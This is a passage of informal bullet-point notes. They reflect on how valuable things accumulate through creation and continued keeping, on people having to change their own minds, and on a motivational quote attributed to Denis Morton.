    • The job tells them a thing to keep optimizing!

  • A process of accumulation: a person makes a decision to change the world, which requires clearing a high intention bar. 

    • Then other people continually vote that it’s useful to keep, preventing it from eroding away.

    • But it gets smoother through erosion and selective rebuilding.

    • The process of keeping is orders of magnitude cheaper than the process of creating.

    • This is the process by which everything of value emerges.

  • You can't change someone's mind.

    • They have to change their own.

    • If they don't realize there's a hole in their understanding, they aren't yet ready to change their mind.

  • Denis Morton: “If you can’t get out of it, get into it!”

